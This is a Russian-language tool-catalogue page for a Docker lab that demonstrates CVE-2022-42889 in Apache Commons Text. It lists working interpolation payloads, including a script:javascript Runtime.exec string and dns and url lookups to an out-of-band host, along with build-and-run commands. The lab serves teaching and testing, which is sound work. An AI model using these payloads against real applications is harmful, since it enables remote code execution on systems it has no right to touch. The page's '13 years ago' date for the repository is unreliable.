Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/necroteddy/cve-2022-42889
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubnecroteddy/cve-2022-42889

CVE-2022-42889

docker для CVE-2022-42889

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-42889-POC

Простое демонстрационное приложение, показывающее, как эксплуатировать уязвимость CVE-2022-42889.
Использует OOB-сервисы (Out of Band) для демонстрации префиксов dns и url.

JavaDocs для интерполяции commons-text commons-text JavaDocs

Примеры интерполяций

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

Цитата от Rapid7

Данную уязвимость сравнивают с Log4Shell, поскольку это уязвимость уровня библиотеки с открытым исходным кодом, которая, вероятно, затронет множество программных приложений, использующих соответствующий объект.
Однако первоначальный анализ показывает, что это сравнение неудачно. Характер уязвимости означает, что, в отличие от Log4Shell, редко встречаются приложения, которые используют уязвимый компонент Commons Text для обработки недоверенных, потенциально вредоносных входных данных.

Предварительные требования

  • docker
  • java
  • maven

Java и maven можно пропустить, если загрузить образ из Docker Hub

Использование

Сборка приложения

root@kitploit:~
mvn clean package

Сборка docker-образа

root@kitploit:~
docker build -t cve-2022-42889-poc .

Запуск docker-образа

root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc

Откройте приложение и следуйте инструкциям

root@kitploit:~
open http://localhost:8081

Дополнительная информация

  • NIST NVD
  • Rapid 7
Скачать инструмент